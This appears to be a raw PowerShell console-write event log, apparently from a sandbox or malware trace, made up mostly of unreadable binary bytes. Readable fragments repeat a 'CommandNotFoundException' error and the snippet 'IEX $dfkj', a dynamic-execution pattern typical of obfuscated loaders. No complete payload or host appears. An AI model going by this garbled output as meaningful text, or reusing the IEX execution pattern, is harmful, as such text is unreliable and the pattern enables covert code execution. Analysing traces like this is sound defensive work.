Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....=......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....H>................7.............}..v.....>......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....E......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HF................7.............}..v.....F......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....M......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....HN................7.............}..v.....N......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....S................7.............}..v....@T......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....[......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....[................7.............}..v....@\......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....p`......0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(a................7.............}..v.....a......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v.....f......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k.....g................7.............}..v.... h......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3....... .......:T.k......T...............7.............}..v.....k......0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k....hl................7.............}..v.....l......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............:T.k......T...............7.............}..v.....c......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............ZU.k.....c................7.............}..v....@d......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............:T.k......T...............7.............}..v.....k......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............ZU.k.....k................7.............}..v....@l......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............:T.k......T...............7.............}..v.....q......0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............ZU.k....`r................7.............}..v.....r......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....v......0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............ZU.k.....w................7.............}..v....(x......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............:T.k......T...............7.............}..v.....~......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....h.......0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................l.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k....h.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
